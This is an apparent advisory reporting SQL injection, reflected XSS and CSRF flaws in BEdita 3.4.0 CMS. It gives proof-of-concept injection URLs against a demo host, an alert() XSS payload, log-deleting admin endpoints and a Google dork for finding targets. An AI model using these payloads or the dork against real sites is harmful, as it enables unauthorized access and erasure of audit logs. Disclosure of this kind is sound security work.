BEdita 3.4.0 CMS Multiple Vulnerabilities

🗓️ 03 Jun 2014 00:00:00Reported by Smash_Type

zdt🔗 0day.today👁 18 Views

BEdita 3.4.0 CMS Multiple Vulnerabilities including SQL Injection, XSS, and CSR

#Title: BEdita 3.4.0 CMS Multiple Vulnerabilities
#Vendor: bedita.com
#Demo: site.demo.bedita.com
#Version: 3.4.0 (Latest ATM)
#Date: 02.06.14
#Dork: intext:"Proudly powered by BEdita"
#Contact: smash[at]devilteam.pl

#1 - SQL Injection via user_created

So, anyone is able to search for publications using specific user ID. For example, if i would like to seek for news from user with ID 1, url would look like:

 host/search/user_created:1

Parameter user_created is vulnerable to sql injection - sql error appears when parameter is incorrectly modified.

PoC:
site.demo.bedita.com/search/user_created:1' and '1'='1
site.demo.bedita.com/search/user_created:1' and '1'='2

#2 - Cross Site Scripting at admin panel (login page)

Since url is being used in javascript as remote_url_response parameter, attacker is able to execute xss because of poor filtration.

host/authentications/xss";%20alert(666);%20lel="123

Source will look like:
<script type="text/javascript">
var remote_url_response = "/pages/helpOnline/authentications/xss"; alert(666); lel="123";
(...)

PoC:
manage.demo.bedita.com/authentications/xss";%20alert(666);%20lel="123

#3 CSRF

 a) Delete system events

localhost/bedita/index.php/admin/deleteEventLog

 b) Delete system logs

localhost/bedita/index.php/admin/emptySystemLog

 c) Delete mail logs

localhost/bedita/index.php/admin/deleteAllMailLogs

#  0day.today [2018-04-12]  #

03 Jun 2014 00:00Current

7.2High risk

Vulners AI Score7.2